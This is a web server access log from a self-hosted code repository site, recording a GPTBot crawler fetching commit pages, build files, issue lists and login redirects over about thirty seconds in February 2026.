git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:39:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 12976] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:39:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13010] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:17:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:39:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11047] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:39:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:17:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:39:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20392] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20392] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md" -[17/Feb/2026:17:39:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old?display=source" [Client 74.7.227.38] [Length 16838] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:17:39:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" -[17/Feb/2026:17:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build" -[17/Feb/2026:17:39:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:17:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile?display=source" [Client 74.7.227.38] [Length 15630] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:39:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:39:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19509] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:39:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles" [Client 74.7.227.38] [Length 77877] [Gzip 13.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:17:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude" [Client 74.7.227.38] [Length 51358] [Gzip 7.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:17:39:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fcmake_install.cmake" [Client 74.7.227.38] [Length 27350] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:17:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles" [Client 74.7.227.38] [Length 176279] [Gzip 16.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:17:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude" [Client 74.7.227.38] [Length 39856] [Gzip 8.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:17:39:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fMakefile" [Client 74.7.227.38] [Length 28070] [Gzip 6.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:17:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeCache.txt" [Client 74.7.227.38] [Length 28878] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:17:39:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeCache.txt" [Client 74.7.227.38] [Length 35213] [Gzip 8.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:39:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude" [Client 74.7.227.38] [Length 29570] [Gzip 6.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:17:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeCache.txt" [Client 74.7.227.38] [Length 34518] [Gzip 8.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:17:39:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles" [Client 74.7.227.38] [Length 54085] [Gzip 9.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:17:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fMakefile" [Client 74.7.227.38] [Length 29929] [Gzip 7.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:17:39:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" [Client 74.7.227.38] [Length 11572] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" -[17/Feb/2026:17:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fOpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 23635] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" -[17/Feb/2026:17:39:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/labels?sort=leastissues&state=" [Client 74.7.227.38] [Length 7655] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/labels" -[17/Feb/2026:17:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=name&state=all" [Client 74.7.227.38] [Length 8477] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=name&state=open" -[17/Feb/2026:17:39:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:17:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:17:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" -[17/Feb/2026:17:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" -[17/Feb/2026:17:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:17:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" -[17/Feb/2026:17:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" -[17/Feb/2026:17:39:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 11553] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:17:39:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcConnectionTest/obj/Debug/net8.0" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:17:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:17:39:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:17:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:17:39:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:17:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:17:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug" [Client 74.7.227.38] [Length 10109] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:17:39:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 11804] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:17:39:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 11356] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:17:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 11187] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:17:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 11362] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:17:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10871] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/my_database.db" -[17/Feb/2026:17:39:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:17:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:17:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr 